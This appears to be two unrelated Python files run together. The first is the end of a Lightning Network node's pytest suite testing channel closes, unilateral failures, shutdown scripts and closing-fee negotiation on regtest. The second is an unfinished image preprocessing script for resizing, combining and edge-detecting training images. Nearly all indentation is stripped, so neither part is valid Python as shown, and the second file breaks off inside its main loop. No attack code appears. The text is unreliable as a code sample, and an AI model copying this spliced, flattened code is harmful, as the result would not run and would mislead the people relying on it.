assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(5)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
@pytest.mark.developer("needs DEVELOPER=1")
def test_permfail_htlc_out(node_factory, bitcoind, executor):
# Test case where we fail with unsettled outgoing HTLC.
disconnects = ['+WIRE_REVOKE_AND_ACK', 'permfail']
l1 = node_factory.get_node(options={'dev-no-reconnect': None})
# Feerates identical so we don't get gratuitous commit to update them
l2 = node_factory.get_node(disconnect=disconnects,
feerates=(7500, 7500, 7500, 7500))
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l2.daemon.wait_for_log('Handed peer, entering loop')
l2.fundchannel(l1, 10**6)
# This will fail at l2's end.
t = executor.submit(l2.pay, l1, 200000000)
l2.daemon.wait_for_log('dev_disconnect permfail')
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Their unilateral tx, old commit point')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_logs([
'Propose handling OUR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TX \\(.*\\) after 6 blocks',
'Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks'
])
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/THEIR_HTLC by THEIR_HTLC_TIMEOUT_TO_THEM \\(IGNORING\\) after 6 blocks')
# l1 then gets preimage, uses it instead of ignoring
l1.wait_for_onchaind_broadcast('THEIR_HTLC_FULFILL_TO_US',
'THEIR_UNILATERAL/THEIR_HTLC')
# l2 sees l1 fulfill tx.
bitcoind.generate_block(1)
l2.daemon.wait_for_log('OUR_UNILATERAL/OUR_HTLC gave us preimage')
t.cancel()
# l2 can send OUR_DELAYED_RETURN_TO_WALLET after 3 more blocks.
bitcoind.generate_block(3)
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# Now, 100 blocks they should be done.
bitcoind.generate_block(95)
sync_blockheight(bitcoind, [l1, l2])
assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
sync_blockheight(bitcoind, [l2])
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(3)
sync_blockheight(bitcoind, [l2])
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
@pytest.mark.developer("needs DEVELOPER=1")
def test_permfail(node_factory, bitcoind):
l1, l2 = node_factory.line_graph(2)
# The funding change should be confirmed and our only output
assert [o['status'] for o in l1.rpc.listfunds()['outputs']] == ['confirmed']
l1.pay(l2, 200000000)
# Make sure l2 has received sig with 0 htlcs!
l2.daemon.wait_for_log('Received commit_sig with 1 htlc sigs')
l2.daemon.wait_for_log('Received commit_sig with 0 htlc sigs')
# Make sure l1 has final revocation.
l1.daemon.wait_for_log('Sending commit_sig with 1 htlc sigs')
l1.daemon.wait_for_log('Sending commit_sig with 0 htlc sigs')
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# We fail l2, so l1 will reconnect to it.
l2.rpc.dev_fail(l1.info['id'])
l2.daemon.wait_for_log('Failing due to dev-fail command')
l2.wait_for_channel_onchain(l1.info['id'])
assert l1.bitcoin.rpc.getmempoolinfo()['size'] == 1
# Now grab the close transaction
closetxid = only_one(l1.bitcoin.rpc.getrawmempool(False))
# l2 will send out tx (l1 considers it a transient error)
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Their unilateral tx, old commit point')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET (.*) after 5 blocks')
wait_for(lambda: only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
== ['ONCHAIN:Tracking their unilateral close',
'ONCHAIN:All outputs resolved: waiting 99 more blocks before forgetting channel'])
def check_billboard():
billboard = only_one(l2.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status']
return (
len(billboard) == 2
and billboard[0] == 'ONCHAIN:Tracking our own unilateral close'
and re.fullmatch(r'ONCHAIN:.* outputs unresolved: in 4 blocks will spend DELAYED_OUTPUT_TO_US \(.*:.*\) using OUR_DELAYED_RETURN_TO_WALLET', billboard[1])
)
wait_for(check_billboard)
# Now, mine 4 blocks so it sends out the spending tx.
bitcoind.generate_block(4)
# onchaind notes to-local payment immediately.
assert (closetxid, "confirmed") in set([(o['txid'], o['status']) for o in l1.rpc.listfunds()['outputs']])
# Restart, should still be confirmed (fails: unwinding blocks erases
# the confirmation, and we don't re-make it).
l1.restart()
wait_for(lambda: (closetxid, "confirmed") in set([(o['txid'], o['status']) for o in l1.rpc.listfunds()['outputs']]))
# It should send the to-wallet tx.
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# 100 after l1 sees tx, it should be done.
bitcoind.generate_block(95)
wait_for(lambda: l1.rpc.listpeers()['peers'] == [])
wait_for(lambda: only_one(l2.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status'] == [
'ONCHAIN:Tracking our own unilateral close',
'ONCHAIN:All outputs resolved: waiting 5 more blocks before forgetting channel'
])
# Now, 100 blocks l2 should be done.
bitcoind.generate_block(100)
wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
# Only l1 has a direct output since all of l2's outputs are respent (it
# failed). Also the output should now be listed as confirmed since we
# generated some more blocks.
assert (closetxid, "confirmed") in set([(o['txid'], o['status']) for o in l1.rpc.listfunds()['outputs']])
    # Check that all the addresses match what we generated ourselves:
for o in l1.rpc.listfunds()['outputs']:
txout = bitcoind.rpc.gettxout(o['txid'], o['output'])
addr = scriptpubkey_addr(txout['scriptPubKey'])
assert(addr == o['address'])
addr = l1.bitcoin.getnewaddress()
l1.rpc.withdraw(addr, "all")
@pytest.mark.developer("needs DEVELOPER=1")
def test_shutdown(node_factory):
# Fail, in that it will exit before cleanup.
l1 = node_factory.get_node(may_fail=True)
if not node_factory.valgrind:
leaks = l1.rpc.dev_memleak()['leaks']
if len(leaks):
raise Exception("Node {} has memory leaks: {}"
.format(l1.daemon.lightning_dir, leaks))
l1.rpc.stop()
@flaky
@pytest.mark.developer("needs to set upfront_shutdown_script")
def test_option_upfront_shutdown_script(node_factory, bitcoind, executor):
# There's a workaround in channeld, that it treats incoming errors
# before both sides are locked in as warnings; this happens in
# this test, so l1 reports the error as a warning!
l1 = node_factory.get_node(start=False, allow_warning=True)
# Insist on upfront script we're not going to match.
l1.daemon.env["DEV_OPENINGD_UPFRONT_SHUTDOWN_SCRIPT"] = "76a91404b61f7dc1ea0dc99424464cc4064dc564d91e8988ac"
l1.start()
l2 = node_factory.get_node()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fundchannel(l2, 1000000, False)
    # This will block, as l2 will send an error when it sees the mismatched script.
fut = executor.submit(l1.rpc.close, l2.info['id'])
# l2 will close unilaterally when it dislikes shutdown script.
l1.daemon.wait_for_log(r'scriptpubkey .* is not as agreed upfront \(76a91404b61f7dc1ea0dc99424464cc4064dc564d91e8988ac\)')
# Clear channel.
wait_for(lambda: len(bitcoind.rpc.getrawmempool()) != 0)
bitcoind.generate_block(1)
fut.result(TIMEOUT)
wait_for(lambda: [c['state'] for c in only_one(l1.rpc.listpeers()['peers'])['channels']] == ['ONCHAIN'])
wait_for(lambda: [c['state'] for c in only_one(l2.rpc.listpeers()['peers'])['channels']] == ['ONCHAIN'])
# Works when l2 closes channel, too.
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fundchannel(l2, 1000000, False)
l2.rpc.close(l1.info['id'])
# l2 will close unilaterally when it dislikes shutdown script.
l1.daemon.wait_for_log(r'scriptpubkey .* is not as agreed upfront \(76a91404b61f7dc1ea0dc99424464cc4064dc564d91e8988ac\)')
# Clear channel.
wait_for(lambda: len(bitcoind.rpc.getrawmempool()) != 0)
bitcoind.generate_block(1)
wait_for(lambda: [c['state'] for c in only_one(l1.rpc.listpeers()['peers'])['channels']] == ['ONCHAIN', 'ONCHAIN'])
wait_for(lambda: [c['state'] for c in only_one(l2.rpc.listpeers()['peers'])['channels']] == ['ONCHAIN', 'ONCHAIN'])
# Figure out what address it will try to use.
keyidx = int(l1.db_query("SELECT intval FROM vars WHERE name='bip32_max_index';")[0]['intval'])
# Expect 1 for change address, plus 1 for the funding address of the actual
# funding tx.
addr = l1.rpc.call('dev-listaddrs', [keyidx + 2])['addresses'][-1]
# the above used to be keyidx + 3, but that was when `fundchannel`
# used the `txprepare`-`txdiscard`-`txprepare` trick, which skipped
# one address in the discarded tx.
# Now we use PSBTs, which means we never discard and skip an address.
# Now, if we specify upfront and it's OK, all good.
l1.stop()
# We need to prepend the segwit version (0) and push opcode (14).
l1.daemon.env["DEV_OPENINGD_UPFRONT_SHUTDOWN_SCRIPT"] = '0014' + addr['bech32_redeemscript']
l1.start()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.rpc.fundchannel(l2.info['id'], 1000000)
l1.rpc.close(l2.info['id'])
wait_for(lambda: sorted([c['state'] for c in only_one(l1.rpc.listpeers()['peers'])['channels']]) == ['CLOSINGD_COMPLETE', 'ONCHAIN', 'ONCHAIN'])
@pytest.mark.developer("needs to set upfront_shutdown_script")
def test_invalid_upfront_shutdown_script(node_factory, bitcoind, executor):
l1, l2 = node_factory.line_graph(2, fundchannel=False)
l1 = node_factory.get_node(start=False, allow_warning=True)
# Insist on upfront script we're not going to match.
l1.daemon.env["DEV_OPENINGD_UPFRONT_SHUTDOWN_SCRIPT"] = "76a91404b61f7dc1ea0dc99424464cc4064dc564d91e8988ac00"
l1.start()
l2 = node_factory.get_node()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
with pytest.raises(RpcError, match=r'Unacceptable upfront_shutdown_script'):
l1.fundchannel(l2, 1000000, False)
@pytest.mark.developer("needs to set upfront_shutdown_script")
@pytest.mark.slow_test
def test_segwit_shutdown_script(node_factory, bitcoind, executor):
"""
Try a range of future segwit versions as shutdown scripts. We create many nodes, so this is quite slow under valgrind
"""
l1 = node_factory.get_node(allow_warning=True)
# BOLT #2:
# 5. if (and only if) `option_shutdown_anysegwit` is negotiated:
# * `OP_1` through `OP_16` inclusive, followed by a single push of 2 to 40 bytes
# (witness program versions 1 through 16)
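    # Each hex script below is: the version opcode (OP_1 = 0x51 ... OP_16 = 0x60),
    # then a raw push opcode giving the witness-program length (0x02-0x28, i.e. 2-40
    # bytes), then that many zero bytes as a dummy witness program.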
edge_valid = ['51020000', '5128' + '00' * 0x28,
'60020000', '6028' + '00' * 0x28]
other_valid = ['52020000', '5228' + '00' * 0x28,
'53020000', '5328' + '00' * 0x28,
'54020000', '5428' + '00' * 0x28,
'55020000', '5528' + '00' * 0x28,
'56020000', '5628' + '00' * 0x28,
'57020000', '5728' + '00' * 0x28,
'58020000', '5828' + '00' * 0x28,
'59020000', '5928' + '00' * 0x28,
'5A020000', '5A28' + '00' * 0x28,
'5B020000', '5B28' + '00' * 0x28,
'5C020000', '5C28' + '00' * 0x28,
'5D020000', '5D28' + '00' * 0x28,
'5E020000', '5E28' + '00' * 0x28,
'5F020000', '5F28' + '00' * 0x28]
invalid = ['50020000', # Not OP_1-OP_16
'61020000', # Not OP_1-OP_16
'5102000000', # Extra bytes
'510100', # Too short
'5129' + '00' * 0x29] # Too long
# Don't stress CI; just test edge cases
if SLOW_MACHINE:
valid = edge_valid
else:
valid = edge_valid + other_valid
# More efficient to create them all up-front.
nodes = node_factory.get_nodes(len(valid) + len(invalid))
# Give it one UTXO to spend for each node.
addresses = {}
for n in nodes:
addresses[l1.rpc.newaddr()['bech32']] = (10**6 + 100000) / 10**8
bitcoind.rpc.sendmany("", addresses)
bitcoind.generate_block(1)
wait_for(lambda: len(l1.rpc.listfunds()['outputs']) == len(addresses))
# FIXME: Since we don't support other non-v0 encodings, we need a protocol
# test for this (we're actually testing our upfront check, not the real
    # shutdown one!).
for script in valid:
# Insist on upfront script we're not going to match.
l1.stop()
l1.daemon.env["DEV_OPENINGD_UPFRONT_SHUTDOWN_SCRIPT"] = script
l1.start()
l2 = nodes.pop()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.rpc.fundchannel(l2.info['id'], 10**6)
for script in invalid:
# Insist on upfront script we're not going to match.
l1.stop()
l1.daemon.env["DEV_OPENINGD_UPFRONT_SHUTDOWN_SCRIPT"] = script
l1.start()
l2 = nodes.pop()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
with pytest.raises(RpcError, match=r'Unacceptable upfront_shutdown_script'):
l1.rpc.fundchannel(l2.info['id'], 10**6)
@unittest.skipIf(not EXPERIMENTAL_FEATURES, "Needs anchor_outputs")
@pytest.mark.developer("needs to set dev-disconnect")
def test_closing_higherfee(node_factory, bitcoind, executor):
"""With anchor outputs we can ask for a *higher* fee than the last commit tx"""
# We change the feerate before it starts negotiating close, so it aims
# for *higher* than last commit tx.
l1, l2 = node_factory.line_graph(2, opts=[{'may_reconnect': True,
'dev-no-reconnect': None,
'feerates': (7500, 7500, 7500, 7500),
'disconnect': ['-WIRE_CLOSING_SIGNED']},
{'may_reconnect': True,
'dev-no-reconnect': None,
'feerates': (7500, 7500, 7500, 7500)}])
# This will trigger disconnect.
fut = executor.submit(l1.rpc.close, l2.info['id'])
l1.daemon.wait_for_log('dev_disconnect')
# Now adjust fees so l1 asks for more on reconnect.
l1.set_feerates((30000,) * 4, False)
l2.set_feerates((30000,) * 4, False)
l1.restart()
l2.restart()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
# This causes us to *exceed* previous requirements!
l1.daemon.wait_for_log(r'deriving max fee from rate 30000 -> 16440sat \(not 1000000sat\)')
# This will fail because l1 restarted!
with pytest.raises(RpcError, match=r'Channel forgotten before proper close.'):
fut.result(TIMEOUT)
# But we still complete negotiation!
wait_for(lambda: only_one(l1.rpc.listpeers()['peers'])['channels'][0]['state'] == 'CLOSINGD_COMPLETE')
wait_for(lambda: only_one(l2.rpc.listpeers()['peers'])['channels'][0]['state'] == 'CLOSINGD_COMPLETE')
@pytest.mark.developer("needs dev_disconnect")
def test_htlc_rexmit_while_closing(node_factory, executor):
"""Retranmitting an HTLC revocation while shutting down should work"""
# l1 disconnects after sending second COMMITMENT_SIGNED.
# Then it stops receiving after sending WIRE_SHUTDOWN (which is before it
# reads the revoke_and_ack).
disconnects = ['+WIRE_COMMITMENT_SIGNED*2',
'xWIRE_SHUTDOWN']
l1, l2 = node_factory.line_graph(2, opts=[{'may_reconnect': True,
'dev-no-reconnect': None,
'disconnect': disconnects},
{'may_reconnect': True,
'dev-no-reconnect': None}])
# Start payment, will disconnect
l1.pay(l2, 200000)
wait_for(lambda: only_one(l1.rpc.listpeers()['peers'])['connected'] is False)
# Tell it to close (will block)
fut = executor.submit(l1.rpc.close, l2.info['id'])
# Original problem was with multiple disconnects, but to simplify we make
# l2 send shutdown too.
fut2 = executor.submit(l2.rpc.close, l1.info['id'])
# Reconnect, shutdown will continue disconnect again
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
# Now l2 should be in CLOSINGD_SIGEXCHANGE, l1 still waiting on
# WIRE_REVOKE_AND_ACK.
wait_for(lambda: only_one(only_one(l2.rpc.listpeers()['peers'])['channels'])['state'] == 'CLOSINGD_SIGEXCHANGE')
assert only_one(only_one(l1.rpc.listpeers()['peers'])['channels'])['state'] == 'CHANNELD_SHUTTING_DOWN'
# They don't realize they're not talking, so disconnect and reconnect.
l1.rpc.disconnect(l2.info['id'], force=True)
# Now it hangs, since l1 is expecting rexmit of revoke-and-ack.
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
fut.result(TIMEOUT)
fut2.result(TIMEOUT)
@pytest.mark.openchannel('v1')
@pytest.mark.developer("needs dev_disconnect")
def test_you_forgot_closed_channel(node_factory, executor):
"""Ideally you'd keep talking to us about closed channels: simple"""
disconnects = ['@WIRE_CLOSING_SIGNED']
l1, l2 = node_factory.line_graph(2, opts=[{'may_reconnect': True,
'dev-no-reconnect': None},
{'may_reconnect': True,
'dev-no-reconnect': None,
'disconnect': disconnects}])
l1.pay(l2, 200000)
fut = executor.submit(l1.rpc.close, l2.info['id'])
# l2 considers the closing done, l1 does not
wait_for(lambda: only_one(only_one(l2.rpc.listpeers()['peers'])['channels'])['state'] == 'CLOSINGD_COMPLETE')
assert only_one(only_one(l1.rpc.listpeers()['peers'])['channels'])['state'] == 'CLOSINGD_SIGEXCHANGE'
# l1 reconnects, it should succeed.
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
fut.result(TIMEOUT)
@pytest.mark.developer("needs dev_disconnect")
def test_you_forgot_closed_channel_onchain(node_factory, bitcoind, executor):
"""Ideally you'd keep talking to us about closed channels: even if close is mined"""
disconnects = ['@WIRE_CLOSING_SIGNED']
l1, l2 = node_factory.line_graph(2, opts=[{'may_reconnect': True,
'dev-no-reconnect': None},
{'may_reconnect': True,
'dev-no-reconnect': None,
'disconnect': disconnects}])
l1.pay(l2, 200000)
fut = executor.submit(l1.rpc.close, l2.info['id'])
# l2 considers the closing done, l1 does not
wait_for(lambda: only_one(only_one(l2.rpc.listpeers()['peers'])['channels'])['state'] == 'CLOSINGD_COMPLETE')
assert only_one(only_one(l1.rpc.listpeers()['peers'])['channels'])['state'] == 'CLOSINGD_SIGEXCHANGE'
# l1 does not see any new blocks.
def no_new_blocks(req):
return {"result": {"blockhash": None, "block": None}}
l1.daemon.rpcproxy.mock_rpc('getrawblockbyheight', no_new_blocks)
# Close transaction mined
bitcoind.generate_block(1, wait_for_mempool=1)
wait_for(lambda: only_one(only_one(l2.rpc.listpeers()['peers'])['channels'])['state'] == 'ONCHAIN')
# l1 reconnects, it should succeed.
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
fut.result(TIMEOUT)
@unittest.skipIf(TEST_NETWORK == 'liquid-regtest', "Uses regtest addresses")
@pytest.mark.developer("too slow without fast polling for blocks")
def test_segwit_anyshutdown(node_factory, bitcoind, executor):
"""Try a range of future segwit versions for shutdown"""
l1, l2 = node_factory.line_graph(2, fundchannel=False)
l1.fundwallet(10**7)
# Based on BIP-320, but all changed to regtest.
addrs = ("BCRT1QW508D6QEJXTDG4Y5R3ZARVARY0C5XW7KYGT080",
"bcrt1qrp33g0q5c5txsp9arysrx4k6zdkfs4nce4xj0gdcccefvpysxf3qzf4jry",
"bcrt1pw508d6qejxtdg4y5r3zarvary0c5xw7kw508d6qejxtdg4y5r3zarvary0c5xw7k0ylj56",
"BCRT1SW50QT2UWHA",
"bcrt1zw508d6qejxtdg4y5r3zarvaryv2wuatf",
"bcrt1qqqqqp399et2xygdj5xreqhjjvcmzhxw4aywxecjdzew6hylgvseswlauz7",
"bcrt1pqqqqp399et2xygdj5xreqhjjvcmzhxw4aywxecjdzew6hylgvsesyga46z",
"bcrt1p0xlxvlhemja6c4dqv22uapctqupfhlxm9h8z3k2e72q4k9hcz7vqc8gma6")
for addr in addrs:
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.rpc.fundchannel(l2.info['id'], 10**6)
# If we don't actually make a payment, two of the above cases fail
# because the resulting tx is too small! Balance channel so close
# has two outputs.
bitcoind.generate_block(1, wait_for_mempool=1)
wait_for(lambda: any([c['state'] == 'CHANNELD_NORMAL' for c in only_one(l1.rpc.listpeers()['peers'])['channels']]))
l1.pay(l2, 10**9 // 2)
l1.rpc.close(l2.info['id'], destination=addr)
bitcoind.generate_block(1, wait_for_mempool=1)
wait_for(lambda: all([c['state'] == 'ONCHAIN' for c in only_one(l1.rpc.listpeers()['peers'])['channels']]))
@pytest.mark.developer("needs to manipulate features")
@unittest.skipIf(TEST_NETWORK == 'liquid-regtest', "Uses regtest addresses")
def test_anysegwit_close_needs_feature(node_factory, bitcoind):
"""Rather than have peer reject our shutdown, we should refuse to shutdown toa v1+ address if they don't support it"""
# L2 says "no option_shutdown_anysegwit"
l1, l2 = node_factory.line_graph(2, opts=[{'may_reconnect': True},
{'may_reconnect': True,
'dev-force-features': -27}])
with pytest.raises(RpcError, match=r'Peer does not allow v1\+ shutdown addresses'):
l1.rpc.close(l2.info['id'], destination='bcrt1pw508d6qejxtdg4y5r3zarvary0c5xw7kw508d6qejxtdg4y5r3zarvary0c5xw7k0ylj56')
# From TFM: "Tell your friends to upgrade!"
l2.stop()
del l2.daemon.opts['dev-force-features']
l2.start()
# Now it will work!
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.rpc.close(l2.info['id'], destination='bcrt1pw508d6qejxtdg4y5r3zarvary0c5xw7kw508d6qejxtdg4y5r3zarvary0c5xw7k0ylj56')
wait_for(lambda: only_one(only_one(l1.rpc.listpeers()['peers'])['channels'])['state'] == 'CLOSINGD_COMPLETE')
bitcoind.generate_block(1, wait_for_mempool=1)
def test_close_feerate_range(node_factory, bitcoind, chainparams):
"""Test the quick-close fee range negotiation"""
l1, l2 = node_factory.line_graph(2)
notifications = []
def save_notifications(message, progress, request, **kwargs):
notifications.append(message)
# Lowball the range here.
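    # 253perkw is lightningd's minimum feerate (about 1 sat/vbyte); 'normal' resolves
    # to its current estimate for ordinary confirmation, so the offered range is wide.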
with l1.rpc.notify(save_notifications):
l1.rpc.close(l2.info['id'], feerange=['253perkw', 'normal'])
if not chainparams['elements']:
l1_range = [138, 4110]
l2_range = [1027, 1000000]
else:
# That fee output is a little chunky.
l1_range = [175, 5212]
l2_range = [1303, 1000000]
l1.daemon.wait_for_log('Negotiating closing fee between {}sat and {}sat satoshi'.format(l1_range[0], l1_range[1]))
l2.daemon.wait_for_log('Negotiating closing fee between {}sat and {}sat satoshi'.format(l2_range[0], l2_range[1]))
overlap = [max(l1_range[0], l2_range[0]), min(l1_range[1], l2_range[1])]
l1.daemon.wait_for_log('performing quickclose in range {}sat-{}sat'.format(overlap[0], overlap[1]))
log = l1.daemon.is_in_log('Their actual closing tx fee is .*sat')
rate = re.match('.*Their actual closing tx fee is ([0-9]*sat).*', log).group(1)
assert notifications == ['Sending closing fee offer {}, with range {}sat-{}sat'.format(rate,
l1_range[0],
l1_range[1]),
'Received closing fee offer {}, with range {}sat-{}sat'.format(rate,
l2_range[0],
l2_range[1])]
def test_close_twice(node_factory, executor):
# First feerate is too low, second fixes it.
l1, l2 = node_factory.line_graph(2, opts=[{'allow_warning': True,
'may_reconnect': True},
{'allow_warning': True,
'may_reconnect': True,
'feerates': (15000, 15000, 15000, 15000)}])
# This makes it disconnect, since feerate is too low.
fut = executor.submit(l1.rpc.close, l2.info['id'], feerange=['253perkw', '500perkw'])
l1.daemon.wait_for_log('WARNING.*Unable to agree on a feerate')
fut2 = executor.submit(l1.rpc.close, l2.info['id'], feerange=['253perkw', '15000perkw'])
# Now reconnect, it should work.
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
assert fut.result(TIMEOUT)['type'] == 'mutual'
assert fut2.result(TIMEOUT)['type'] == 'mutual'
|
process.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import os
import tempfile
import subprocess
import tensorflow as tf
import numpy as np
from . import tfimage as im
import threading
import time
import multiprocessing
parser = argparse.ArgumentParser()
parser.add_argument("--input_dir", required=True, help="path to folder containing images")
parser.add_argument("--output_dir", required=True, help="output path")
parser.add_argument("--operation", required=True, choices=["grayscale", "resize", "blank", "combine", "edges"])
parser.add_argument("--workers", type=int, default=1, help="number of workers")
# resize
parser.add_argument("--pad", action="store_true", help="pad instead of crop for resize operation")
parser.add_argument("--size", type=int, default=256, help="size to use for resize operation")
# combine
parser.add_argument("--b_dir", type=str, help="path to folder containing B images for combine operation")
a = parser.parse_args()
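# Typical flag combinations (paths are illustrative):
#   --input_dir photos --operation resize --size 256 --output_dir photos_resized
#   --input_dir photos_a --b_dir photos_b --operation combine --output_dir combined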
def resize(src):
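    # e.g. a 300x200 (WxH) input: with --pad it is padded to 300x300 (50px added top
    # and bottom); without --pad it is center-cropped to 200x200. The square result is
    # then scaled to --size.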
height, width, _ = src.shape
dst = src
if height != width:
if a.pad:
size = max(height, width)
# pad to correct ratio
oh = (size - height) // 2
ow = (size - width) // 2
dst = im.pad(image=dst, offset_height=oh, offset_width=ow, target_height=size, target_width=size)
else:
# crop to correct ratio
size = min(height, width)
oh = (height - size) // 2
ow = (width - size) // 2
dst = im.crop(image=dst, offset_height=oh, offset_width=ow, target_height=size, target_width=size)
assert(dst.shape[0] == dst.shape[1])
size, _, _ = dst.shape
if size > a.size:
dst = im.downscale(images=dst, size=[a.size, a.size])
elif size < a.size:
dst = im.upscale(images=dst, size=[a.size, a.size])
return dst
def blank(src):
height, width, _ = src.shape
if height != width:
raise Exception("non-square image")
image_size = width
size = int(image_size * 0.3)
offset = int(image_size / 2 - size / 2)
dst = src
dst[offset:offset + size,offset:offset + size,:] = np.ones([size, size, 3])
return dst
def combine(src, src_path):
if a.b_dir is None:
raise Exception("missing b_dir")
# find corresponding file in b_dir, could have a different extension
basename, _ = os.path.splitext(os.path.basename(src_path))
# print(basename)
for ext in [".png", ".jpg"]:
sibling_path = os.path.join(a.b_dir, basename + ext)
print(sibling_path)
if os.path.exists(sibling_path):
sibling = im.load(sibling_path)
break
else:
raise Exception("could not find sibling image for " + src_path)
# make sure that dimensions are correct
height, width, _ = src.shape
if height != sibling.shape[0] or width != sibling.shape[1]:
raise Exception("differing sizes")
# convert both images to RGB if necessary
if src.shape[2] == 1:
src = im.grayscale_to_rgb(images=src)
if sibling.shape[2] == 1:
sibling = im.grayscale_to_rgb(images=sibling)
# remove alpha channel
if src.shape[2] == 4:
src = src[:,:,:3]
if sibling.shape[2] == 4:
sibling = sibling[:,:,:3]
return np.concatenate([src, sibling], axis=1)
def grayscale(src):
return im.grayscale_to_rgb(images=im.rgb_to_grayscale(images=src))
net = None
def run_caffe(src):
# lazy load caffe and create net
global net
if net is None:
# don't require caffe unless we are doing edge detection
os.environ["GLOG_minloglevel"] = "2" # disable logging from caffe
import caffe
# using this requires using the docker image or assembling a bunch of dependencies
# and then changing these hardcoded paths
net = caffe.Net("/opt/caffe/examples/hed/deploy.prototxt", "/opt/caffe/hed_pretrained_bsds.caffemodel", caffe.TEST)
net.blobs["data"].reshape(1, *src.shape)
net.blobs["data"].data[...] = src
net.forward()
return net.blobs["sigmoid-fuse"].data[0][0,:,:]
# create the pool before we launch processing threads
# we must create the pool after run_caffe is defined
if a.operation == "edges":
edge_pool = multiprocessing.Pool(a.workers)
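    # edges() hands each preprocessed image to this pool via apply(), so Caffe runs in
    # separate worker processes instead of inside the TF worker threads started in main().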
def edges(src):
# based on https://github.com/phillipi/pix2pix/blob/master/scripts/edges/batch_hed.py
# and https://github.com/phillipi/pix2pix/blob/master/scripts/edges/PostprocessHED.m
import scipy.io
src = src * 255
border = 128 # put a padding around images since edge detection seems to detect edge of image
src = src[:,:,:3] # remove alpha channel if present
src = np.pad(src, ((border, border), (border, border), (0,0)), "reflect")
src = src[:,:,::-1]
src -= np.array((104.00698793,116.66876762,122.67891434))
src = src.transpose((2, 0, 1))
# [height, width, channels] => [batch, channel, height, width]
fuse = edge_pool.apply(run_caffe, [src])
fuse = fuse[border:-border, border:-border]
with tempfile.NamedTemporaryFile(suffix=".png") as png_file, tempfile.NamedTemporaryFile(suffix=".mat") as mat_file:
scipy.io.savemat(mat_file.name, {"input": fuse})
octave_code = r"""
E = 1-load(input_path).input;
E = imresize(E, [image_width,image_width]);
E = 1 - E;
E = single(E);
[Ox, Oy] = gradient(convTri(E, 4), 1);
[Oxx, ~] = gradient(Ox, 1);
[Oxy, Oyy] = gradient(Oy, 1);
O = mod(atan(Oyy .* sign(-Oxy) ./ (Oxx + 1e-5)), pi);
E = edgesNmsMex(E, O, 1, 5, 1.01, 1);
E = double(E >= max(eps, threshold));
E = bwmorph(E, 'thin', inf);
E = bwareaopen(E, small_edge);
E = 1 - E;
E = uint8(E * 255);
imwrite(E, output_path);
"""
config = dict(
input_path="'%s'" % mat_file.name,
output_path="'%s'" % png_file.name,
image_width=256,
threshold=25.0/255.0,
small_edge=5,
)
args = ["octave"]
for k, v in config.items():
args.extend(["--eval", "%s=%s;" % (k, v)])
args.extend(["--eval", octave_code])
try:
subprocess.check_output(args, stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as e:
print("octave failed")
print("returncode:", e.returncode)
print("output:", e.output)
raise
return im.load(png_file.name)
def process(src_path, dst_path):
src = im.load(src_path)
if a.operation == "grayscale":
dst = grayscale(src)
elif a.operation == "resize":
dst = resize(src)
elif a.operation == "blank":
dst = blank(src)
elif a.operation == "combine":
dst = combine(src, src_path)
elif a.operation == "edges":
dst = edges(src)
else:
raise Exception("invalid operation")
im.save(dst, dst_path)
complete_lock = threading.Lock()
start = time.time()
num_complete = 0
total = 0
def complete():
global num_complete, rate, last_complete
with complete_lock:
num_complete += 1
now = time.time()
elapsed = now - start
rate = num_complete / elapsed
if rate > 0:
remaining = (total - num_complete) / rate
else:
remaining = 0
print("%d/%d complete %0.2f images/sec %dm%ds elapsed %dm%ds remaining" % (num_complete, total, rate, elapsed // 60, elapsed % 60, remaining // 60, remaining % 60))
last_complete = now
def main():
if not os.path.exists(a.output_dir):
os.makedirs(a.output_dir)
src_paths = []
dst_paths = []
for src_path in im.find(a.input_dir):
